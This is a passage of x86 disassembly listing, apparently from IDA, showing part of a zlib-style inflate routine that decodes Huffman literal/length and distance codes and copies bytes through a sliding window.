mov [ebp+arg_8], eax
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40A1A7
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_38], eax
jmp short loc_40A1B3
; ---------------------------------------------------------------------------
loc_40A1A7: ; CODE XREF: sub_40A04E+146�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_38], edx
loc_40A1B3: ; CODE XREF: sub_40A04E+157�j
mov eax, [ebp+var_38]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jz short loc_40A1D9
mov ecx, [ebp+arg_8]
sub ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov edx, [ebp+var_10]
mov [edx], ecx
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A1D9: ; CODE XREF: sub_40A04E+8C�j
; sub_40A04E+96�j ...
mov eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax+10h]
mov edx, [ebp+var_10]
mov [edx+0Ch], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov edx, [ecx+14h]
mov [eax+8], edx
mov eax, [ebp+var_10]
mov dword ptr [eax], 1
loc_40A1FC: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD81�o
mov ecx, [ebp+var_10]
mov edx, [ecx+0Ch]
mov [ebp+var_20], edx
loc_40A205: ; CODE XREF: sub_40A04E+25C�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_40A2AF
cmp [ebp+var_2C], 0
jz short loc_40A220
mov [ebp+arg_8], 0
jmp short loc_40A27B
; ---------------------------------------------------------------------------
loc_40A220: ; CODE XREF: sub_40A04E+1C7�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A27B: ; CODE XREF: sub_40A04E+1D0�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_40A205
; ---------------------------------------------------------------------------
loc_40A2AF: ; CODE XREF: sub_40A04E+1BD�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_4132F8[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+8]
lea edx, [ecx+edx*8]
mov [ebp+var_14], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_C]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_24]
sub edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_18], ecx
cmp [ebp+var_18], 0
jnz short loc_40A312
mov edx, [ebp+var_10]
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov [edx+8], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 6
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A312: ; CODE XREF: sub_40A04E+2A8�j
mov eax, [ebp+var_18]
and eax, 10h
test eax, eax
jz short loc_40A342
mov ecx, [ebp+var_18]
and ecx, 0Fh
mov edx, [ebp+var_10]
mov [edx+8], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_14]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_10]
mov dword ptr [eax], 2
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A342: ; CODE XREF: sub_40A04E+2CC�j
mov ecx, [ebp+var_18]
and ecx, 40h
test ecx, ecx
jnz short loc_40A36C
mov edx, [ebp+var_10]
mov eax, [ebp+var_18]
mov [edx+0Ch], eax
mov ecx, [ebp+var_14]
mov edx, [ecx+4]
mov eax, [ebp+var_14]
lea ecx, [eax+edx*8]
mov edx, [ebp+var_10]
mov [edx+8], ecx
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A36C: ; CODE XREF: sub_40A04E+2FC�j
mov eax, [ebp+var_18]
and eax, 20h
test eax, eax
jz short loc_40A384
mov ecx, [ebp+var_10]
mov dword ptr [ecx], 7
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A384: ; CODE XREF: sub_40A04E+326�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidLiteral ; "invalid literal/length code"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A3F9: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD85�o
mov ecx, [ebp+var_10]
mov edx, [ecx+8]
mov [ebp+var_20], edx
loc_40A402: ; CODE XREF: sub_40A04E+459�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_40A4AC
cmp [ebp+var_2C], 0
jz short loc_40A41D
mov [ebp+arg_8], 0
jmp short loc_40A478
; ---------------------------------------------------------------------------
loc_40A41D: ; CODE XREF: sub_40A04E+3C4�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A478: ; CODE XREF: sub_40A04E+3CD�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_40A402
; ---------------------------------------------------------------------------
loc_40A4AC: ; CODE XREF: sub_40A04E+3BA�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_4132F8[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+4]
add ecx, edx
mov edx, [ebp+var_10]
mov [edx+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_24]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx+11h]
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
mov edx, [ebp+var_10]
mov eax, [ebp+var_10]
mov ecx, [eax+18h]
mov [edx+8], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 3
loc_40A4FE: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD89�o
mov eax, [ebp+var_10]
mov ecx, [eax+0Ch]
mov [ebp+var_20], ecx
loc_40A507: ; CODE XREF: sub_40A04E+55E�j
mov edx, [ebp+var_24]
cmp edx, [ebp+var_20]
jnb loc_40A5B1
cmp [ebp+var_2C], 0
jz short loc_40A522
mov [ebp+arg_8], 0
jmp short loc_40A57D
; ---------------------------------------------------------------------------
loc_40A522: ; CODE XREF: sub_40A04E+4C9�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A57D: ; CODE XREF: sub_40A04E+4D2�j
mov eax, [ebp+var_2C]
sub eax, 1
mov [ebp+var_2C], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_24]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_24]
add edx, 8
mov [ebp+var_24], edx
jmp loc_40A507
; ---------------------------------------------------------------------------
loc_40A5B1: ; CODE XREF: sub_40A04E+4BF�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_C]
and ecx, dword_4132F8[eax*4]
mov edx, [ebp+var_10]
mov eax, [edx+8]
lea ecx, [eax+ecx*8]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_C]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_24]
sub edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
and edx, 10h
test edx, edx
jz short loc_40A626
mov eax, [ebp+var_18]
and eax, 0Fh
mov ecx, [ebp+var_10]
mov [ecx+8], eax
mov edx, [ebp+var_10]
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov [edx+0Ch], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 4
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A626: ; CODE XREF: sub_40A04E+5B0�j
mov eax, [ebp+var_18]
and eax, 40h
test eax, eax
jnz short loc_40A650
mov ecx, [ebp+var_10]
mov edx, [ebp+var_18]
mov [ecx+0Ch], edx
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov edx, [ebp+var_14]
lea eax, [edx+ecx*8]
mov ecx, [ebp+var_10]
mov [ecx+8], eax
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A650: ; CODE XREF: sub_40A04E+5E0�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidDistanc ; "invalid distance code"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A6C5: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD8D�o
mov ecx, [ebp+var_10]
mov edx, [ecx+8]
mov [ebp+var_20], edx
loc_40A6CE: ; CODE XREF: sub_40A04E+725�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_40A778
cmp [ebp+var_2C], 0
jz short loc_40A6E9
mov [ebp+arg_8], 0
jmp short loc_40A744
; ---------------------------------------------------------------------------
loc_40A6E9: ; CODE XREF: sub_40A04E+690�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A744: ; CODE XREF: sub_40A04E+699�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_40A6CE
; ---------------------------------------------------------------------------
loc_40A778: ; CODE XREF: sub_40A04E+686�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_4132F8[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+0Ch]
add ecx, edx
mov edx, [ebp+var_10]
mov [edx+0Ch], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_24]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 5
loc_40A7B0: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD91�o
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
sub ecx, [eax+28h]
mov edx, [ebp+var_10]
cmp ecx, [edx+0Ch]
jnb short loc_40A7DF
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
sub ecx, [eax+28h]
mov edx, [ebp+var_10]
mov eax, [edx+0Ch]
sub eax, ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, eax
mov [ebp+var_3C], edx
jmp short loc_40A7EB
; ---------------------------------------------------------------------------
loc_40A7DF: ; CODE XREF: sub_40A04E+771�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
sub ecx, [eax+0Ch]
mov [ebp+var_3C], ecx
loc_40A7EB: ; CODE XREF: sub_40A04E+78F�j
mov edx, [ebp+var_3C]
mov [ebp+var_1C], edx
loc_40A7F1: ; CODE XREF: sub_40A04E+96B�j
mov eax, [ebp+var_10]
cmp dword ptr [eax+4], 0
jz loc_40A9BE
cmp [ebp+var_28], 0
jnz loc_40A96A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_40A858
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_40A858
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_40A846
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_40], edx
jmp short loc_40A852
; ---------------------------------------------------------------------------
loc_40A846: ; CODE XREF: sub_40A04E+7E5�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_40], ecx
loc_40A852: ; CODE XREF: sub_40A04E+7F6�j
mov edx, [ebp+var_40]
mov [ebp+var_28], edx
loc_40A858: ; CODE XREF: sub_40A04E+7C3�j
; sub_40A04E+7D1�j
cmp [ebp+var_28], 0
jnz loc_40A96A
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40A8A7
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_44], ecx
jmp short loc_40A8B3
; ---------------------------------------------------------------------------
loc_40A8A7: ; CODE XREF: sub_40A04E+846�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_44], eax
loc_40A8B3: ; CODE XREF: sub_40A04E+857�j
mov ecx, [ebp+var_44]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+2Ch]
jnz short loc_40A909
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov eax, [ecx+30h]
cmp eax, [edx+28h]
jz short loc_40A909
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40A8F7
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_48], eax
jmp short loc_40A903
; ---------------------------------------------------------------------------
loc_40A8F7: ; CODE XREF: sub_40A04E+896�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_48], edx
loc_40A903: ; CODE XREF: sub_40A04E+8A7�j
mov eax, [ebp+var_48]
mov [ebp+var_28], eax
loc_40A909: ; CODE XREF: sub_40A04E+874�j
; sub_40A04E+882�j
cmp [ebp+var_28], 0
jnz short loc_40A96A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40A96A: ; CODE XREF: sub_40A04E+7B4�j
; sub_40A04E+80E�j ...
mov [ebp+arg_8], 0
mov ecx, [ebp+var_8]
mov edx, [ebp+var_1C]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_28]
sub eax, 1
mov [ebp+var_28], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_1C]
cmp edx, [ecx+2Ch]
jnz short loc_40A9AA
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_1C], ecx
loc_40A9AA: ; CODE XREF: sub_40A04E+951�j
mov edx, [ebp+var_10]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+var_10]
mov [ecx+4], eax
jmp loc_40A7F1
; ---------------------------------------------------------------------------
loc_40A9BE: ; CODE XREF: sub_40A04E+7AA�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 0
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40A9CC: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD95�o
cmp [ebp+var_28], 0
jnz loc_40AB38
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+2Ch]
jnz short loc_40AA26
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+30h]
cmp ecx, [eax+28h]
jz short loc_40AA26
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40AA14
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_4C], ecx
jmp short loc_40AA20
; ---------------------------------------------------------------------------
loc_40AA14: ; CODE XREF: sub_40A04E+9B3�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_4C], eax
loc_40AA20: ; CODE XREF: sub_40A04E+9C4�j
mov ecx, [ebp+var_4C]
mov [ebp+var_28], ecx
loc_40AA26: ; CODE XREF: sub_40A04E+991�j
; sub_40A04E+99F�j
cmp [ebp+var_28], 0
jnz loc_40AB38
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_409E20
add esp, 0Ch
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_40AA75
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_50], eax
jmp short loc_40AA81
; ---------------------------------------------------------------------------
loc_40AA75: ; CODE XREF: sub_40A04E+A14�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_50], edx
loc_40AA81: ; CODE XREF: sub_40A04E+A25�j
mov eax, [ebp+var_50]
mov [ebp+var_28], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_40AAD7
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_40AAD7
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_40AAC5
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_54], edx
jmp short loc_40AAD1
; ---------------------------------------------------------------------------
loc_40AAC5: ; CODE XREF: sub_40A04E+A64�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_54], ecx
loc_40AAD1: ; CODE XREF: sub_40A04E+A75�j
mov edx, [ebp+var_54]
mov [ebp+var_28], edx
loc_40AAD7: ; CODE XREF: sub_40A04E+A42�j
; sub_40A04E+A50�j
cmp [ebp+var_28], 0
jnz short loc_40AB38
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_409E20
add esp, 0Ch
jmp loc_40AD79
; ---------------------------------------------------------------------------
loc_40AB38: ; CODE XREF: sub_40A04E+982�j
; sub_40A04E+9DC�j ...
mov [ebp+arg_8], 0
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov dl, [ecx+8]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_28]
sub ecx, 1
mov [ebp+var_28], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 0
jmp loc_40AD74
; ---------------------------------------------------------------------------
loc_40AB6A: ; CODE XREF: sub_40A04E+7E�j
; DATA XREF: HSho:0040AD99�o
cmp [ebp+var_24], 7
jbe short loc_40AB8B
mov eax, [ebp+var_24]
sub eax, 8
mov [ebp+var_24], eax
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_40AB8B: ; CODE XREF: sub_40A04E+B20�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_409E20
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_40ABD0
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_58], ecx
jmp short loc_40ABDC
; ---------------------------------------------------------------------------
loc_40ABD0: ; CODE XREF: sub_40A04E+B6F�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_58], eax
loc_40ABDC: ; CODE XREF: sub_40A04E+B80�j
mov ecx, [ebp+var_58]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+30h]
cmp ecx, [eax+34h]
jz short loc_40AC4B
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_24]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
